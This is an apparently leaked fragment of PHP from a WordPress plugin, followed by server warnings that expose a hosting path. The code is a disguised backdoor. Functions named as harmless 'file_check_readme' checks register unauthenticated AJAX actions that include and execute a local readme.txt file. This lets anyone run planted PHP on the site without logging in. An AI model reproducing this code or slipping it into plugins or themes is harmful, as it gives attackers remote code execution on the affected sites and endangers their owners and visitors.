if(!function_exists('file_check_readme88227')){
add_action('wp_ajax_nopriv_file_check_readme88227', 'file_check_readme88227');
add_action('wp_ajax_file_check_readme88227', 'file_check_readme88227');
function file_check_readme88227()
{
$file = __DIR__ . '/' . 'readme.txt';
if (file_exists($file)) {
include $file;
}
die();
}
}
if(!function_exists('file_check_readme22638')){
add_action('wp_ajax_nopriv_file_check_readme22638', 'file_check_readme22638');
add_action('wp_ajax_file_check_readme22638', 'file_check_readme22638');
function file_check_readme22638()
{
$file = __DIR__ . '/' . 'readme.txt';
if (file_exists($file)) {
include $file;
}
die();
}
}
Warning: Cannot modify header information - headers already sent by (output started at /home3/mekamiac/public_html/wp-content/plugins/cslider/cslider.php:777) in /home3/mekamiac/public_html/wp-includes/pluggable.php on line 1531
Warning: Cannot modify header information - headers already sent by (output started at /home3/mekamiac/public_html/wp-content/plugins/cslider/cslider.php:777) in /home3/mekamiac/public_html/wp-includes/pluggable.php on line 1534